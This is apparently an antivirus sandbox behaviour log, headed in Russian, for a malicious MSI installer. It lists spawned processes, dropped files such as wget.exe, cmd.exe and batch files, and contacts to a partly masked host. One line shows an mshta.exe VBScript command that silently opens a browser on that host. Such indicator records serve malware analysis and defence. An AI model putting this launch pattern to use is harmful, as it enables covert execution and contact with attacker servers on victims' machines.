Техническая информация
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\msiexec.exe' -Embedding 24B2E1865FE9F8BAD957DF3491D40F1B
- '<SYSTEM32>\msiexec.exe' /i c:\MSDOC.msi
- '<SYSTEM32>\mshta.exe' vbscript:createobject("wscript.shell").run("""iexplore""http://cn##.sjt8.com/info.access/?st######",0)(window.close)
- '%PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE' http://cn##.sjt8.com/info.access/?st######
- %WINDIR%\Installer\25aa9.msi
- %TEMP%\24b86.msi
- C:\MSDOC.msi
- %TEMP%\MSI24b87.LOG
- %WINDIR%\Installer\MSI3.tmp
- %WINDIR%\Installer\MSI2.tmp
- <LS_APPDATA>\exe1.ini
- <LS_APPDATA>\cmd.exe
- %TEMP%\~1.bat
- <LS_APPDATA>\wget.exe
- <LS_APPDATA>\hta.ini
- <LS_APPDATA>\exe2.ini
- %TEMP%\~1.bat
- %WINDIR%\Installer\MSI3.tmp
- %WINDIR%\Installer\MSI2.tmp
- 'cn##.sjt8.com':80
- 'localhost':1038
- cn##.sjt8.com/info.access/?st######
- DNS ASK cn##.sjt8.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''